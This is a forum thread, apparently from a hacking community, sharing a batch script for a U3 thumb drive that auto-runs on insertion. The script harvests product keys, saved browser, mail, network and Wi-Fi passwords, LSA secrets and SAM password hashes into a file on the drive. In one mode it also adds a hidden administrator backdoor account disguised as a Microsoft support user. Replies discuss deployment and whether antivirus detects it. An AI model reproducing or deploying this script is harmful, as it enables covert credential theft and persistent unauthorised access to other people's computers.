Jump to content

Recommended Posts

Posted

I just turn this into a ISO and burn it to the U3. The thumbdrive can remain totaly empty and it will still work. The way I have it setup is so that it reads all the drive volume labels and looks for a certain string. My U3 thumbdrive is named "2 GB (1)" the 1 stands for mode 1 in which it just gets password/key data and nothing else. 2 installs the remote user and 0 just runs launchpad. This will have to be modified a bit for each user but its prety straight forward. Also I didn't post any links to the programs cause there easy to find but if you have trouble finding one just ask.

@ECHO OFF

FOR %%A IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (

FOR /F "tokens=1-8" %%1 IN ('VOL %%A:') DO (

IF %%6%%7%%8 EQU 2GB^(0^) (

START %%A:U3LauncherLaunchU3.exe

)

IF %%6%%7%%8 EQU 2GB^(1^) (

SET USBDrive=%%A

)

IF %%6%%7%%8 EQU 2GB^(2^) (

SET BackDoor=1

SET USBDrive=%%A

)

)

)

IF NOT DEFINED USBDrive EXIT

ECHO #####################################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve Microsoft Product Keys ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ProduKey.exe /stab %TEMP%ProduKey.txt

TYPE %TEMP%ProduKey.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve WAN IP ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

wget.exe -t1 -T1 -q http://dynupdate.no-ip.com/ip.php -O %TEMP%wanip.txt

TYPE %TEMP%wanip.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve LAN IP ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ipconfig.exe>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ################################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve Program Passwords ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ################################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

iepv.exe /stab %TEMP%iepv.txt

mailpv.exe /stab %TEMP%mailpv.txt

mspass.exe /stab %TEMP%mspass.txt

netpass.exe /stab %TEMP%netpass.txt

pspv.exe /stab %TEMP%pspv.txt

WirelessKeyView.exe /stab %TEMP%WirelessKeyView.txt

TYPE %TEMP%iepv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%mailpv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%mspass.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%netpass.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%pspv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%WirelessKeyView.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ############################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve LSA Passwords ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ############################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

LSASecretsDump.exe>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ########################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve SAM Files ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ########################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

PwDump.exe 127.0.0.1>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

IF DEFINED BackDoor (

ECHO ##########################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Create Backdoor User ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ##########################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

NET USER /ADD SUPPORT_388945a1 password /FULLNAME:"Microsoft Corporation">>%USBDrive%:PC_%COMPUTERNAME%.txt

NET LOCALGROUP Administrators SUPPORT_388945a1 /ADD>>%USBDrive%:PC_%COMPUTERNAME%.txt

REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /V SUPPORT_388945a1 /T REG_DWORD /D 0 /F>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

)

REM ############################

REM ## Delete Temporary Files ##

REM ############################

DEL /F /Q %TEMP%ProduKey.txt

DEL /F /Q %TEMP%ip.php

DEL /F /Q %TEMP%iepv.txt

DEL /F /Q %TEMP%mailpv.txt

DEL /F /Q %TEMP%mspass.txt

DEL /F /Q %TEMP%netpass.txt

DEL /F /Q %TEMP%pspv.txt

DEL /F /Q %TEMP%WirelessKeyView.txt

It seems to work without error but I would love suggestions on improvment if you have any.

Posted

This is a replacement for go.cmd. You turn this into a .cmd and put it on the iso with all the tools. Then name the thumbdrive part 2 GB (0) or whatever u want as long as its <something> *space* <something> *space* (0,1,2)/

Posted

The only reason people never "burned" the payload into the iso is so that you can edit it on the fly and not have to reformat your USB Drive to update the new payload.

The only thing I would "burn" would be static files. However, really this does not have any advantage.

Posted
would this still be picked up by antivirus programs?

Yes. It's not the batch is the problem, it's the applications being used to enumerate the information.

However, the antivirus will not be able to remove the file, just not allow the OS to run it.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...